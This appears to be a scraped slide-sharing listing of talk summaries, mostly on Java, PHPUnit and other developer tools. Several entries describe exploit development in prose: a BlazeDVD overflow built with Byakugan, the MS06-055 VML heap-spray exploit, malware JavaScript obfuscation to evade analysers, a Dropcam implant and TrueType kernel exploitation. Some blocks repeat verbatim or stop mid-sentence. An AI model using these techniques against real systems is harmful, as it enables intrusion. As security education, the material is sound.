This document discusses how debugger modules and plugins like Byakugan can help speed up the basic exploit development process. It provides an example using Byakugan to develop an exploit for a vulnerability in BlazeDVD in just one crash. Byakugan is loaded in WinDbg and used to find the offset to EIP when providing a crash payload containing a Metasploit pattern. This offset is then used to build a working exploit targeting the stack-based buffer overflow in under 30 lines of code, demonstrating how Byakugan can accelerate the process of developing an initial exploit.
The document summarizes the current state of PHPUnit and provides information about upcoming features. Key points include:
- PHPUnit version 3.6.12 is the current version with over 60 contributors since 3.6.0. Version 3.7 will introduce 15+ new features and fix 10+ issues.
- Efforts are being made to avoid backwards compatibility breaks between versions.
- Upcoming features include improved exception handling, JSON assertion methods, callback matchers, OO arrays support, and a PHPUnit XSD schema file.
- The ecosystem around PHPUnit is growing with tools like Behat, Mockery, Proxy Object, and wsUnit.
The document discusses the current state of PHPUnit and upcoming changes. Some key points:
- PHPUnit version 3.6.12 is the current version with over 60 contributors since 3.6.0. Version 3.7 will introduce 15+ new features and fix 10+ issues.
- Efforts are being made to avoid backwards compatibility breaks between versions. A few minor BC breaks are possible.
- The PHPUnit ecosystem includes tools like Behat for BDD, Mockery for mocking, and wsUnit for testing web services.
- PHPUnit improvements include better exception reporting, JSON assertion methods, process isolation fixes, and more descriptive failure messages.
- Upcoming features include less magic
The document discusses exploiting a buffer overflow vulnerability in Internet Explorer's VML implementation (MS06-055) to execute arbitrary code. It describes overwriting the structured exception handler to gain control of the instruction pointer, using heap spraying to load a buffer in memory, and having the instruction pointer jump to the buffer to execute shellcode and spawn a command shell. Metasploit is introduced as an open-source framework for developing exploits.
Photon Server Deep Dive - View from Implmentation of PhotonWire, Multiplayer ...Yoshifumi Kawai
This document discusses PhotonWire, a framework for building networked games and applications. It allows clients and servers to communicate asynchronously using operations and operation requests/responses. Clients can send messages to servers using operations, which are received and handled via a switch statement based on operation code. Servers can then send response messages back to clients. The document also mentions plans to improve serialization performance in PhotonWire by replacing the current serializer.
Performance has always been a major concern in software development and should not be taken lightly even when commodity computers have multicore CPUs and a few gigabytes of RAM. One of the most handy, simple tools for performance testing are microbenchmarks. Unfortunately, developing correct Java microbenchmarks is a complex task with many pitfalls on the way. This presentation is about the Do's and Don'ts of Java microbenchmarking and about what tools are out there to help with this tricky task.
This document discusses concurrency and concurrent programming in Java. It introduces the built-in concurrency primitives like wait(), notify(), synchronized, and volatile. It then discusses higher-level concurrency utilities and data structures introduced in JDK 5.0 like Executors, ExecutorService, ThreadPools, Future, Callable, ConcurrentHashMap, CopyOnWriteArrayList that provide safer and more usable concurrency constructs. It also briefly covers topics like Java Memory Model, memory barriers, and happens-before ordering.
This document discusses Fork/Join framework in Java 7. It explains that Fork/Join is designed to maximize usage of multiple processors by recursively splitting large tasks into smaller subtasks. It uses work-stealing algorithm where idle workers can steal tasks from busy workers' queues to balance load. An example of calculating Fibonacci numbers using Fork/Join is provided where the task is split recursively until the subproblem size is smaller than threshold, at which point it is computed directly.
The document summarizes the current state of PHPUnit and provides information about upcoming features. Key points include:
- PHPUnit version 3.6.12 is the current version with over 60 contributors since 3.6.0. Version 3.7 will introduce 15+ new features and fix 10+ issues.
- Efforts are being made to avoid backwards compatibility breaks between versions.
- Upcoming features include improved exception handling, JSON assertion methods, callback matchers, OO arrays support, and a PHPUnit XSD schema file.
- The ecosystem around PHPUnit is growing with tools like Behat, Mockery, Proxy Object, and wsUnit.
The document discusses the current state of PHPUnit and upcoming changes. Some key points:
- PHPUnit version 3.6.12 is the current version with over 60 contributors since 3.6.0. Version 3.7 will introduce 15+ new features and fix 10+ issues.
- Efforts are being made to avoid backwards compatibility breaks between versions. A few minor BC breaks are possible.
- The PHPUnit ecosystem includes tools like Behat for BDD, Mockery for mocking, and wsUnit for testing web services.
- PHPUnit improvements include better exception reporting, JSON assertion methods, process isolation fixes, and more descriptive failure messages.
- Upcoming features include less magic
The document discusses exploiting a buffer overflow vulnerability in Internet Explorer's VML implementation (MS06-055) to execute arbitrary code. It describes overwriting the structured exception handler to gain control of the instruction pointer, using heap spraying to load a buffer in memory, and having the instruction pointer jump to the buffer to execute shellcode and spawn a command shell. Metasploit is introduced as an open-source framework for developing exploits.
Photon Server Deep Dive - View from Implmentation of PhotonWire, Multiplayer ...Yoshifumi Kawai
This document discusses PhotonWire, a framework for building networked games and applications. It allows clients and servers to communicate asynchronously using operations and operation requests/responses. Clients can send messages to servers using operations, which are received and handled via a switch statement based on operation code. Servers can then send response messages back to clients. The document also mentions plans to improve serialization performance in PhotonWire by replacing the current serializer.
Performance has always been a major concern in software development and should not be taken lightly even when commodity computers have multicore CPUs and a few gigabytes of RAM. One of the most handy, simple tools for performance testing are microbenchmarks. Unfortunately, developing correct Java microbenchmarks is a complex task with many pitfalls on the way. This presentation is about the Do's and Don'ts of Java microbenchmarking and about what tools are out there to help with this tricky task.
This document discusses concurrency and concurrent programming in Java. It introduces the built-in concurrency primitives like wait(), notify(), synchronized, and volatile. It then discusses higher-level concurrency utilities and data structures introduced in JDK 5.0 like Executors, ExecutorService, ThreadPools, Future, Callable, ConcurrentHashMap, CopyOnWriteArrayList that provide safer and more usable concurrency constructs. It also briefly covers topics like Java Memory Model, memory barriers, and happens-before ordering.
This document discusses Fork/Join framework in Java 7. It explains that Fork/Join is designed to maximize usage of multiple processors by recursively splitting large tasks into smaller subtasks. It uses work-stealing algorithm where idle workers can steal tasks from busy workers' queues to balance load. An example of calculating Fibonacci numbers using Fork/Join is provided where the task is split recursively until the subproblem size is smaller than threshold, at which point it is computed directly.
Creating, obfuscating and analyzing malware JavaScriptKrzysztof Kotowicz
Malware attacks on unaware Internet users' browsers are becoming more and more common. New techniques for bypassing filters used by security vendors emerge. In turn, the filters are getting better, new analyzing tools are developed - the war continues. At the presentation you will learn how crackers are trying to hamper the work of security engineers, and how reversers are overcoming those problems. Emphasis will be placed on the weaknesses of automated tools - we'll try to avoid detection by jsunpack and Capture-HPC, we'll also trick Dean Edwards' Unpacker.
Voxxed Days Vilnius 2015 - Having fun with JavassistAnton Arhipov
The document discusses using Javassist, a Java bytecode engineering library, to dynamically generate Java proxies at runtime. It provides examples of using Javassist with a Java agent to transform class files and generate proxies within a ClassFileTransformer. It also summarizes how Javassist is used within the JRebel application reload agent to refresh configurations and notify plugins of class reloading.
The document describes the development of a C++ wrapper class for the C libcurl library. It defines a curl::easy class that encapsulates a CURL handle and provides methods like set_url() and perform() to set options and execute requests. Over time, the class is refined to add functionality, handle different string types more generically, and improve exception safety. Template classes are introduced to represent C strings in a more object-oriented way.
Java agents are pluggable self contained components that run embedded in a JVM and intercept the classloading process. They were introduced in Java 5 along with the powerful java.lang.instrument package. Java agents can be loaded statically at startup or dynamically (programmatically) at runtime to attach to a running process.
Java agents were an awesome addition to the JVM as it opened a lot of opportunities for tool designers and changed Java tooling landscape quite drastically. In conjunction with Java bytecode manipulation libraries it is now possible to do amazing things to Java classes: we can experiment with programming models, redefine classes at runtime, record execution flow, etc.
I’d like to give an overview of Java agents’ functionality along with the usage examples and real world experiences. You will learn, how to implement an agent and apply Instrumentation API in combination with bytecode manipulation libraries to solve interesting tasks.
This document summarizes new features in JDK 7 including updates to XML stack, JDBC, RowSet, class loading, JVM performance improvements, garbage collection, I/O, graphics APIs, collections, and strict class file checking. It also previews planned features for JDK 8 such as support for modular programming, annotations, collections improvements, lambda expressions, and modularization.
Riga Dev Day 2016 - Having fun with JavassistAnton Arhipov
The document discusses using Javassist, an open-source bytecode engineering library, for bytecode instrumentation and generation of Java proxies. It provides examples of using Javassist's ClassPool and CtClass APIs to dynamically generate and modify classes, such as adding a print statement before a method or generating a class from metadata. The key uses of Javassist mentioned are generating proxies, bytecode instrumentation, and dynamic class generation.
This document discusses various Java technologies including concurrency utilities like ExecutorService and Future, collections like ConcurrentMap, synchronization structures like Semaphore, open source projects like Apache Maven and Guava, mocking frameworks like Mockito, alternative JVM languages, IDEs, JVM performance tools like JVisualVM and YourKit profiler. It encourages viewing technology pragmatically rather than ideologically.
The document discusses slowdowns, hangs, and thread dumps in troubleshooting Java applications. It explains that thread dumps provide a snapshot of thread states and what each thread is doing at a point in time. This can help identify issues like threads getting stuck or competing for resources. The document also demonstrates example output of a thread dump with threads in different states like waiting and provides tips for analyzing thread dumps to diagnose performance problems.
Choosing the right parallel compute architecture corehard_by
Multi-core architecture is the present and future way in which the market is addressing Moore’s law limitations. Multi-core workstations, high performance computers, GPUs and the focus on hybrid/ public cloud technologies for offloading and scaling applications is the direction development is heading. Leveraging multiple cores in order to increase application performance and responsiveness is expected especially from classic high-throughput executions such as rendering, simulations, and heavy calculations. Choosing the correct multi-core strategy for your software requirements is essential, making the wrong decision can have serious implications on software performance, scalability, memory usage and other factors. In this overview, we will inspect various considerations for choosing the correct multi-core strategy for your application’s requirement and investigate the pros and cons of multi-threaded development vs multi-process development. For example, Boost’s GIL (Generic Image Library) provides you with the ability to efficiently code image processing algorithms. However, deciding whether your algorithms should be executed as multi-threaded or multi-process has a high impact on your design, coding, future maintenance, scalability, performance, and other factors.
A partial list of considerations to take into account before taking this architectural decision includes:
- How big are the images I need to process
- What risks can I have in terms of race-conditions, timing issues, sharing violations – does it justify multi-threading programming?
- Do I have any special communication and synchronization requirements?
- How much time would it take my customers to execute a large scenario?
- Would I like to scale processing performance by using the cloud or cluster?
We will then examine these issues in real-world environments. In order to learn how this issue is being addressed in a real-world scenario, we will examine common development and testing environments we are using in our daily work and compare the multi-core strategies they have implemented in order to promote higher development productivity.
Sphinx autodoc - automated api documentation - PyCon.KR 2015Takayuki Shimizukawa
Using the automated documentation feature of Sphinx, you can make with ease the extensive documentation of Python program.
You just write python function documents (docstrings), Sphinx organizes them into the document, can be converted to a variety of formats.
In this session, I'll explain a documentation procedure that uses with sphinx autodoc and autosummary extensions.
The document summarizes Jersey Framework, a Java REST framework. It provides an overview of Jersey's features such as supporting JAX-RS APIs, Servlet 3.0, JSON/JAXB, and integration with Spring. A code sample demonstrates a simple "hello world" RESTful service using Jersey with annotations like @Path, @GET and @Produces. The document also covers additional Jersey concepts like request/response processing, URI building, exception handling, and security.
Efficient Memory and Thread Management in Highly Parallel Java ApplicationsPhillip Koza
This presentation discusses strategies to estimate and control the memory use of multi-threaded java applications. It includes a quick overview of how the JVM uses memory, followed by techniques to estimate the memory usage of various types of objects during testing. This knowledge is then used as the basis for a runtime scheme to estimate and control the memory use of multiple threads. The final part of the presentation describes how to implement robust handling for unchecked exceptions, especially Out Of Memory (OOM) errors, and how to ensure threads stop properly when unexpected events occur.
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門tamtam180
This document provides an overview and refreshers on HTTP access in Java 11. It discusses HttpUrlConnection, Apache HttpClient, and Java's new HttpClient. For HttpUrlConnection, it covers GET requests, modifying request methods and headers, sending request bodies, cookies, proxies, redirects, basic authentication, and debugging. For Apache HttpClient, it discusses GET requests, Accept headers, gzip encoding, query strings, connection pools, modifying request headers and POST requests. It also covers cookies, redirects, retries and proxies for Apache HttpClient.
This document discusses memory models, non-blocking primitives, and lock-free algorithms for concurrent programming. It provides code examples for implementing atomic operations like set, compareAndSet, and lazySet using the Unsafe class. It evaluates the performance of different producer-consumer algorithms like spin-wait, co-operative yielding, and buffering. The document suggests buffering generally performs best by avoiding busy-waiting and allowing other threads to run. It provides references for further information on lock-free programming.
This document contains code for a Jenkins pipeline that defines stages for compiling, testing, packaging, deploying, and smoke testing a build. It also contains code to send notifications to Typetalk if the build fails. Additional code shows how to fetch pull request branches from a Git remote and check if a pull request is open for a given branch.
We have checked the Windows 8 Driver Samples pack with our analyzer PVS-Studio and found various bugs in its samples. There is nothing horrible about it - bugs can be found everywhere, so the title of this article may sound a bit high-flown. But these particular errors may be really dangerous, as it is a usual practice for developers to use demo samples as a basis for their own projects or borrow code fragments from them.
The document summarizes the key new features introduced in each version of Java from JDK 1.0 to Java SE 8. Some major enhancements included strings in switch statements in Java 7, binary and underscore literals, multi-catch exceptions, try-with-resources for automatic resource management, and lambda expressions in Java 8.
This document provides an overview of new features in NIO 2 and asynchronous I/O in Java. It discusses buffers, channels, selectors, file system APIs, file change notification, and asynchronous operations using futures and completion handlers. The key aspects covered include non-blocking I/O, readiness selection, file locking, memory mapping, and file attributes.
Con-FESS 2015 - Having Fun With JavassistAnton Arhipov
This document discusses using Javassist, a bytecode manipulation library, for tasks like adding logging to existing code without modifying the source code. It provides examples of using Javassist to inject logging into a method and creating a Java agent to manipulate bytecode. The document also summarizes how Javassist works under the hood to modify class files and how frameworks like JRebel use it to reload configurations without restarts.
This document discusses the art of exploit writing and penetration testing. It provides an overview of buffer overflow techniques, including stack and heap overflows. It explains the process memory organization and stack structure in computers. The document demonstrates buffer overflow exploits and discusses techniques like fuzzing and avoiding bad characters. The goal is to help security researchers and penetration testers work hard toward mastery of exploit writing through experience over time.
Creating, obfuscating and analyzing malware JavaScriptKrzysztof Kotowicz
Malware attacks on unaware Internet users' browsers are becoming more and more common. New techniques for bypassing filters used by security vendors emerge. In turn, the filters are getting better, new analyzing tools are developed - the war continues. At the presentation you will learn how crackers are trying to hamper the work of security engineers, and how reversers are overcoming those problems. Emphasis will be placed on the weaknesses of automated tools - we'll try to avoid detection by jsunpack and Capture-HPC, we'll also trick Dean Edwards' Unpacker.
Voxxed Days Vilnius 2015 - Having fun with JavassistAnton Arhipov
The document discusses using Javassist, a Java bytecode engineering library, to dynamically generate Java proxies at runtime. It provides examples of using Javassist with a Java agent to transform class files and generate proxies within a ClassFileTransformer. It also summarizes how Javassist is used within the JRebel application reload agent to refresh configurations and notify plugins of class reloading.
The document describes the development of a C++ wrapper class for the C libcurl library. It defines a curl::easy class that encapsulates a CURL handle and provides methods like set_url() and perform() to set options and execute requests. Over time, the class is refined to add functionality, handle different string types more generically, and improve exception safety. Template classes are introduced to represent C strings in a more object-oriented way.
Java agents are pluggable self contained components that run embedded in a JVM and intercept the classloading process. They were introduced in Java 5 along with the powerful java.lang.instrument package. Java agents can be loaded statically at startup or dynamically (programmatically) at runtime to attach to a running process.
Java agents were an awesome addition to the JVM as it opened a lot of opportunities for tool designers and changed Java tooling landscape quite drastically. In conjunction with Java bytecode manipulation libraries it is now possible to do amazing things to Java classes: we can experiment with programming models, redefine classes at runtime, record execution flow, etc.
I’d like to give an overview of Java agents’ functionality along with the usage examples and real world experiences. You will learn, how to implement an agent and apply Instrumentation API in combination with bytecode manipulation libraries to solve interesting tasks.
This document summarizes new features in JDK 7 including updates to XML stack, JDBC, RowSet, class loading, JVM performance improvements, garbage collection, I/O, graphics APIs, collections, and strict class file checking. It also previews planned features for JDK 8 such as support for modular programming, annotations, collections improvements, lambda expressions, and modularization.
Riga Dev Day 2016 - Having fun with JavassistAnton Arhipov
The document discusses using Javassist, an open-source bytecode engineering library, for bytecode instrumentation and generation of Java proxies. It provides examples of using Javassist's ClassPool and CtClass APIs to dynamically generate and modify classes, such as adding a print statement before a method or generating a class from metadata. The key uses of Javassist mentioned are generating proxies, bytecode instrumentation, and dynamic class generation.
This document discusses various Java technologies including concurrency utilities like ExecutorService and Future, collections like ConcurrentMap, synchronization structures like Semaphore, open source projects like Apache Maven and Guava, mocking frameworks like Mockito, alternative JVM languages, IDEs, JVM performance tools like JVisualVM and YourKit profiler. It encourages viewing technology pragmatically rather than ideologically.
The document discusses slowdowns, hangs, and thread dumps in troubleshooting Java applications. It explains that thread dumps provide a snapshot of thread states and what each thread is doing at a point in time. This can help identify issues like threads getting stuck or competing for resources. The document also demonstrates example output of a thread dump with threads in different states like waiting and provides tips for analyzing thread dumps to diagnose performance problems.
Choosing the right parallel compute architecture corehard_by
Multi-core architecture is the present and future way in which the market is addressing Moore’s law limitations. Multi-core workstations, high performance computers, GPUs and the focus on hybrid/ public cloud technologies for offloading and scaling applications is the direction development is heading. Leveraging multiple cores in order to increase application performance and responsiveness is expected especially from classic high-throughput executions such as rendering, simulations, and heavy calculations. Choosing the correct multi-core strategy for your software requirements is essential, making the wrong decision can have serious implications on software performance, scalability, memory usage and other factors. In this overview, we will inspect various considerations for choosing the correct multi-core strategy for your application’s requirement and investigate the pros and cons of multi-threaded development vs multi-process development. For example, Boost’s GIL (Generic Image Library) provides you with the ability to efficiently code image processing algorithms. However, deciding whether your algorithms should be executed as multi-threaded or multi-process has a high impact on your design, coding, future maintenance, scalability, performance, and other factors.
A partial list of considerations to take into account before taking this architectural decision includes:
- How big are the images I need to process
- What risks can I have in terms of race-conditions, timing issues, sharing violations – does it justify multi-threading programming?
- Do I have any special communication and synchronization requirements?
- How much time would it take my customers to execute a large scenario?
- Would I like to scale processing performance by using the cloud or cluster?
We will then examine these issues in real-world environments. In order to learn how this issue is being addressed in a real-world scenario, we will examine common development and testing environments we are using in our daily work and compare the multi-core strategies they have implemented in order to promote higher development productivity.
Sphinx autodoc - automated api documentation - PyCon.KR 2015Takayuki Shimizukawa
Using the automated documentation feature of Sphinx, you can make with ease the extensive documentation of Python program.
You just write python function documents (docstrings), Sphinx organizes them into the document, can be converted to a variety of formats.
In this session, I'll explain a documentation procedure that uses with sphinx autodoc and autosummary extensions.
The document summarizes Jersey Framework, a Java REST framework. It provides an overview of Jersey's features such as supporting JAX-RS APIs, Servlet 3.0, JSON/JAXB, and integration with Spring. A code sample demonstrates a simple "hello world" RESTful service using Jersey with annotations like @Path, @GET and @Produces. The document also covers additional Jersey concepts like request/response processing, URI building, exception handling, and security.
Efficient Memory and Thread Management in Highly Parallel Java ApplicationsPhillip Koza
This presentation discusses strategies to estimate and control the memory use of multi-threaded java applications. It includes a quick overview of how the JVM uses memory, followed by techniques to estimate the memory usage of various types of objects during testing. This knowledge is then used as the basis for a runtime scheme to estimate and control the memory use of multiple threads. The final part of the presentation describes how to implement robust handling for unchecked exceptions, especially Out Of Memory (OOM) errors, and how to ensure threads stop properly when unexpected events occur.
Introduction httpClient on Java11 / Java11時代のHTTPアクセス再入門tamtam180
This document provides an overview and refreshers on HTTP access in Java 11. It discusses HttpUrlConnection, Apache HttpClient, and Java's new HttpClient. For HttpUrlConnection, it covers GET requests, modifying request methods and headers, sending request bodies, cookies, proxies, redirects, basic authentication, and debugging. For Apache HttpClient, it discusses GET requests, Accept headers, gzip encoding, query strings, connection pools, modifying request headers and POST requests. It also covers cookies, redirects, retries and proxies for Apache HttpClient.
This document discusses memory models, non-blocking primitives, and lock-free algorithms for concurrent programming. It provides code examples for implementing atomic operations like set, compareAndSet, and lazySet using the Unsafe class. It evaluates the performance of different producer-consumer algorithms like spin-wait, co-operative yielding, and buffering. The document suggests buffering generally performs best by avoiding busy-waiting and allowing other threads to run. It provides references for further information on lock-free programming.
This document contains code for a Jenkins pipeline that defines stages for compiling, testing, packaging, deploying, and smoke testing a build. It also contains code to send notifications to Typetalk if the build fails. Additional code shows how to fetch pull request branches from a Git remote and check if a pull request is open for a given branch.
We have checked the Windows 8 Driver Samples pack with our analyzer PVS-Studio and found various bugs in its samples. There is nothing horrible about it - bugs can be found everywhere, so the title of this article may sound a bit high-flown. But these particular errors may be really dangerous, as it is a usual practice for developers to use demo samples as a basis for their own projects or borrow code fragments from them.
The document summarizes the key new features introduced in each version of Java from JDK 1.0 to Java SE 8. Some major enhancements included strings in switch statements in Java 7, binary and underscore literals, multi-catch exceptions, try-with-resources for automatic resource management, and lambda expressions in Java 8.
This document provides an overview of new features in NIO 2 and asynchronous I/O in Java. It discusses buffers, channels, selectors, file system APIs, file change notification, and asynchronous operations using futures and completion handlers. The key aspects covered include non-blocking I/O, readiness selection, file locking, memory mapping, and file attributes.
Con-FESS 2015 - Having Fun With JavassistAnton Arhipov
This document discusses using Javassist, a bytecode manipulation library, for tasks like adding logging to existing code without modifying the source code. It provides examples of using Javassist to inject logging into a method and creating a Java agent to manipulate bytecode. The document also summarizes how Javassist works under the hood to modify class files and how frameworks like JRebel use it to reload configurations without restarts.
This document discusses the art of exploit writing and penetration testing. It provides an overview of buffer overflow techniques, including stack and heap overflows. It explains the process memory organization and stack structure in computers. The document demonstrates buffer overflow exploits and discusses techniques like fuzzing and avoiding bad characters. The goal is to help security researchers and penetration testers work hard toward mastery of exploit writing through experience over time.
This document discusses ethical hacking and penetration testing. It provides an overview of the benefits of controlled penetration tests, the process involved, and some real-life case studies. It explains how penetration tests can identify vulnerabilities before they are exploited, help understand an organization's security environment, and serve as a preventative measure when vulnerabilities are remediated. The document outlines the general methodology for internal and external penetration tests, including reconnaissance, scanning, vulnerability analysis, and attempts to gain unauthorized access. Various tools used in the process are also described.
This document provides information on a course titled "Advanced Penetration Testing, Exploit Writing, and Ethical Hacking" with the course code A10_03_4222. The course is worth 46 CPE credits. The document also lists the name of the student, Clay Wells, and the date and time the document was generated, which was 2016-07-11 03:06:24.
TH3 Professional Developper CEH denial of serviceth3prodevelopper
The document discusses denial of service (DoS) and distributed denial of service (DDoS) attacks. It describes a scenario where a new security portal called "HackzXposed4u" crashes within five minutes of its official launch, putting plans on hold. The document then provides an overview of DoS and DDoS attacks, including different types like Smurf, buffer overflow, ping of death, and SYN attacks. It also covers tools and techniques used to carry out DoS/DDoS attacks.
The document discusses various Bluetooth hacking techniques such as Bluejacking, Bluesnarfing, Bluebugging and Blueprinting which can steal sensitive data or take control of Bluetooth devices, and outlines security measures like enabling encryption and changing default settings to protect against attacks. Common attacks explored are Bluejacking to send messages, Bluesnarfing to extract data, and Bluebugging which allows full phone control via AT commands. Countermeasures recommended are disabling Bluetooth when not needed, not accepting unknown files/cards, using long secure pairing codes, and changing default names.
Ethical Hacking Is another aspect of hacking. Like every coin has 2 sides, Ethical Hacking is good one. As Hacker is someone who seeks and exploits weaknesses in a computer system or computer network, but Ethical Hacking is against the bad or black hat Hackers. Ethical Hacker can also known as White Hat Hacker. Ethical Hacking is Legal, its Permission is obtained from the target, its Part of an overall security program. By Techwila http://www.techwila.com
This document provides procedures for conducting an instantaneous change in head (slug) test to determine the hydraulic conductivity of a water-bearing zone. Key steps include understanding test design and theory, determining well conditions, selecting appropriate equipment for inducing a slug and measuring water level changes, conducting the test, assessing results, and considering special situations like wells containing floating product or testing in karst aquifers. The goal is to obtain a quick measurement of hydraulic conductivity near the well while minimizing disposal of water.
This module discusses vulnerabilities in web servers like Apache and IIS. It covers how web servers work, common vulnerabilities in areas like configurations, bugs and default installations. Specific attacks covered include defacement, directory traversal using Unicode encoding, buffer overflows in ISAPI extensions and RPC DCOM. The module also discusses tools used in attacks like IISxploit and countermeasures like patch management and vulnerability scanning.
The document discusses Bluetooth hacking on Android devices. It introduces the presenters and outlines Bluetooth capabilities on early Android versions. It describes unofficial Bluetooth APIs developed for Android 1.x and the official API introduced in Android 2.x. It also demonstrates controlling an Arduino board through Bluetooth using an Android device.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
Four major attacks are covered here:
-Bypass Authentication Via Authentication Token Manipulation.
-Session hijacking.
-Brute forcing login pages using burp.
-HTTP parameter pollution.
This document provides an overview of website structure, common internet protocols, and some common web vulnerabilities. It defines what a website is and its components. It describes protocols like IP, HTTP, HTTPS and their roles. It explains public vs private IP addresses and HTTP status codes and methods. The document then discusses vulnerabilities like HTML injection, SQL injection, and buffer overflow attacks that can be used to bypass authentication or execute code on a server. It provides examples of how these attacks work at a high level.
Searches for new physics at LHC within the Higgs sector. Step 2: Defining the...Raquel Gomez Ambrosio
We discuss the Effective field theory bottom-up approach, and show some examples of its application for VH production at LHC. We find some interesting results regarding the applicability of the perturbative expansion. Finally we discuss the Pseudo Observable approach as a tool for New Physics searches at LHC.
XCon 2014 => http://xcon.xfocus.org/
In the past was quite common to exploit heap / pool manager vulnerabilities attacking its internal linked structures. However current memory management improve a lot and at current date it is quite ineffective to attack heap in this way. But still those techniques come into hand when we start to looking at linked structures widespread throughout kernel that are unfortunately not hardened enough.
In this presentation we will examine power of these vulnerabilities by famous example “CVE – 2013 - 3660”. Showing bypass on ‘lazy’ assertions of _LIST_ENTRY, present exploitation after party and teleport to kernel.
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
The document summarizes the Post Memory Corruption Memory Analysis (PMCMA) tool. PMCMA allows finding and testing exploitation scenarios resulting from invalid memory accesses. It provides a roadmap to exploitation without generating exploit code. The tool analyzes programs after crashes to overwrite memory locations in forked processes and test impact on execution flow.
The document discusses writing buffer overflow exploits. It explains how buffer overflows occur when a program writes more data than the buffer allocated. By controlling the EIP (instruction pointer) register, an exploit can be executed. The document then demonstrates, step-by-step, how to create a buffer overflow exploit against a vulnerable Windows application, including determining the offset to overwrite EIP, finding shellcode to execute a bind shell, and testing the working exploit.
PVS-Studio delved into the FreeBSD kernelPVS-Studio
The document summarizes the author's analysis of the FreeBSD kernel source code using the PVS-Studio static analysis tool. Some key findings include:
1) Over 1000 potential errors were detected by the analyzer, including many typos, copy-paste errors, and issues involving incorrect logical expression evaluations due to operator precedence.
2) Many of the warnings pointed to real bugs, such as identical subexpressions compared using equality operators, equivalent code in "if-else" blocks, and recurring checks of the same condition.
3) Macros were found to cause issues by altering expression evaluation order, highlighting the importance of operator precedence.
4) Examples of specific errors are provided to demonstrate common bugs like
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
The document discusses exploiting TrueType font (TTF) vulnerabilities to achieve kernel code execution on Windows systems. It begins by describing the discovery of exploitable bugs in a TTF fuzzer. Despite mitigations like KASLR, NX, SMAP, and CFG, the researchers were able to bypass these protections through techniques like controlled overflows, abusing plain kernel structures, and function-driven attacks. They show how to leverage wild overflows, control kernel memory layout, and hijack control flow to achieve arbitrary code execution. The document emphasizes that OS design weaknesses allow bypassing modern defenses through clever bug chaining and memory manipulation.
This document describes how an implant could be developed for a Dropcam camera device. It begins by providing background on Dropcam and its capabilities. It then details steps taken to gain root access to the device, including exploiting vulnerabilities in Busybox and OpenSSL. Methods are proposed for persisting access, communicating with a C&C server, determining the device's location, and infecting hosts that view video from the Dropcam. The document concludes by conceptualizing how audio/video capture and injection of hooks could be implemented on the device and connected systems.
Analyzing the Blender project with PVS-StudioPVS-Studio
We go on analyzing open source projects and making the software world better. This time we have checked the Blender 2.62 package intended for creating 3D computer graphics.
New MITM Framework Bettercap A complete, modular, portable and easily extensible MITM framework. Bettercap is a complete, modular,
portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could
need in order to perform a man in the middle attack.
Valgrind is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable. You can also perform detailed profiling to help speed up your programs.
The document discusses the Post Memory Corruption (PMCMA) tool, which allows analyzing memory corruption bugs by testing different memory overwrite scenarios in a process. PMCMA uses a technique called "mk_fork()" to efficiently fork a process multiple times and overwrite different memory locations in each offspring to test for exploitation possibilities. It discusses challenges like dealing with zombie processes and invalid system calls caused by forking, and how PMCMA addresses these through techniques like process grouping and ignoring SIGCHILD signals.
The document discusses various Java Development Kit (JDK) tools for performance diagnostics including VisualVM, BTrace, jhat, and jmap. VisualVM is a visual tool that integrates command line JDK tools and can monitor memory, threads, take heap dumps, and profile CPU and memory. BTrace is a dynamic tracing tool that instruments Java programs at runtime. Jhat analyzes Java heap dumps and allows browsing object references. These tools help detect, analyze, and solve performance issues in Java applications.
Re-checking the ReactOS project - a large reportPVS-Studio
The ReactOS project is rapidly developing. One of the developers participating in this project suggested that we re-analyzed the source code, as the code base is growing fast. We were glad to do that. We like this project, and we'll be happy if this article helps the developers to eliminate some bugs. Analysis was performed with the PVS-Studio 5.02 code analyzer.
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
The document discusses penetration testing of the Easy RM to MP3 Converter application. It begins by setting up the testing environment with Backtrack5, Windows SP2 and SP3 virtual machines, and the vulnerable application. It then analyzes the application dynamically using a debugger to find a buffer overflow vulnerability. The document creates an exploit payload that uses return oriented programming (ROP) to bypass data execution prevention (DEP) and execute shellcode to connect back to the attacker machine for post-exploit access.
This document provides troubleshooting guidance for issues with Ceph. It begins by suggesting identifying the problem domain as either performance, hang, crash, or unexpected behavior. For each problem, it recommends tools and techniques for further investigation such as debugging logs, profiling tools, and source code analysis. Debugging steps include establishing baselines, identifying implicated hosts or subsystems, increasing log verbosity, and tracing transactions through logs. The document emphasizes starting at the user end and working back towards Ceph to isolate issues.
This document summarizes a presentation on evading antivirus detection. It discusses how antivirus has gotten better at detecting old techniques, and introduces newer tools and methods for generating payloads that can bypass antivirus software, including Veil, Hyperion, and writing your own custom stagers and payloads. It also recommends building your own antivirus lab to reliably test new payloads before deployment.
When Good Code Goes Bad: Tools and Techniques for Troubleshooting PloneDavid Glick
Using real issues encountered in the wild, this session will help beginning integrators gain confidence in knowing what to do when Plone fails to behave as expected. Learn how to solve common problems like "My changes aren't taking effect" and "My Zope instance won't start," as well as how to use pdb to investigate more complex Python errors.
This talk is targeted at integrators who have some experience with Plone, but who are not confident in troubleshooting errors and other unexpected behavior. Knowledge of Python is not required, though at least a cursory familiarity with some programming language will make the talk more digestible.
A Check of the Open-Source Project WinSCP Developed in Embarcadero C++ BuilderAndrey Karpov
We regularly check open-source C/C++ projects, but what we check are mostly projects developed in the Visual Studio IDE. For some reason, we haven't paid much attention to the Embarcadero C++ Builder IDE. In order to improve this situation, we are going to discuss the WinSCP project I have checked recently.
P.S. C++ Builder support in PVS-Studio had been dropped after version 5.20. If you have any questions, feel free to contact our support.
How to use Fiware Lab Facilities in order to deploy an application. The presentation will lead us to deploy a full application taking advantage of Openstack Command Line Interfaces.
